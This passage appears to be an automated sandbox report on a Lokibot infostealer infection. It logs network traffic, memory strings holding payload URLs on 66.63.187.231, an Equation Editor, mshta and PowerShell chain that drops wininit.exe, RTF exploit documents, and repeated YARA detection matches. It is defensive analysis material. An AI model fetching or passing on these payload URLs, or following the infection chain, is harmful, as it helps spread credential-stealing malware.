                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.eln
                Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exe
                Source: powershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exeY
                Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
                Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMd
                Source: EQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafd
                Source: EQNEDT32.EXE, 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj
                Source: we on 66.63.187.231.url.0.drString found in binary or memory: http://66.63.187.231/xampp/wer/we/
                Source: powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.415492102.0000000001F91000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: wininit.exe, wininit.exe, 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.22:49166 -> 198.244.140.41:443 version: TLS 1.2
                Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\we on 66.63.187.231.urlJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_003704C016_2_003704C0
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037280816_2_00372808
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037108F16_2_0037108F
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_003710D216_2_003710D2
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037C41016_2_0037C410
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037D6D816_2_0037D6D8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037C84816_2_0037C848
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037CC8016_2_0037CC80
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 16_2_0037BFD816_2_0037BFD8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_0040549C18_2_0040549C
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_004029D418_2_004029D4
                Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
